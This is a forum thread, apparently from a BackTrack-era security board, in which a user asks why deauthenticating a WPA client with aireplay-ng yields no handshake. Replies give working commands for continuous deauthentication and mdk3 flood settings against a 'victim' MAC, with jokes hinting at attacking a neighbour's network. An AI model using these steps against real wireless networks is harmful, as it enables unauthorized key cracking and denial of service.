Hi,
Remember that just because you are close enough to see the AP it does not always mean you are close enough to send data to a connected client.
Cant Deauth WPA STA for Handshake
I've been patient for several hours trying to deauth a station to get a handshake and have been unsuccessful. Maybe I'm not doing something correctly.
The AP is WPA TKIP PSK and I have airodump-ng in a shell running exclusive to that AP channel, AP MAC and it shows a station connected.
In another shell I run aireplay-ng -0 1 -a AP MAC -c STATION MAC <device>
Several times I have sequenced aireplay-ng -0 10 and once -0 100
I have tried aireplay -0 1 -a AP MAC <device> and see only 1 station.
PWR Level is at 34, so I think I am getting signal to it.
Any suggestions?
I am using BT3b
Thanks.
Hi,
Remember that just because you are close enough to see the AP it does not always mean you are close enough to send data to a connected client.
Removed by -=Xploitz=-
We do NOT allow external links. We only allow "internal" links to our forums. See PM's.
Yeah, try walking over to his house and sit on the front porch to do it, you will get a better signal that way.
I felt like bending the bars back, and ripping out the window frames and eating them. yes, eating them! Leaping, leaping, leaping! Colonics for everyone! All right! You dumb*sses. I'm a mental patient. I'm *supposed* to act out!
Then eventually the station would need to re-authorize, correct? For some reason or another and if I was monitiring I'd get the handshake, correct?
I'm using an Alpha 1/2 watt device. I think i should be able to get to the station...
funny, cause I can't auth with the wpa AT HOME!
@ attitude,
Try running aireplay-ng -0 0 -a AP MAC -c STATION MAC <device>
That should continuously deauth and leave it running until you see you have a handshake in airodump. That's always worked for me at least. Also like harry said being close doesn't always mean you will be successful. I've been distant before with a very low power level and the weirdest thing... my usb optical mouse when it was positioned just a certain way close to my wireless card it somehow made injection work. If I moved it away from my card injection stopped, but if I moved it closer and positoned it a certain way it worked just fine
Hope that helps some.
i prefer a more tricky but effective way
create blacklist file containing mac of victim
run a mdk3 deauth / amok flood
adjust delay to 1
adjust packet/burst to 500
adjust speed to 1024
before launch that try to lower your rate as 1M , in order to get more client when scanning
this way , it's a continuous deauth EACH TIME THE CLIENT REQUEST A SINGLE BIT OF TRAFFIC
so you get for sure the handshake but need more work(little)
this function will be available in ezpawn and is available in charon, my guis which hold some mdk3 functions (charon holds all)
Watch your back, your packetz will belong to me soon... xD
BackTrack : Giving Machine Guns to Monkeys since 2006
Posting Permissions
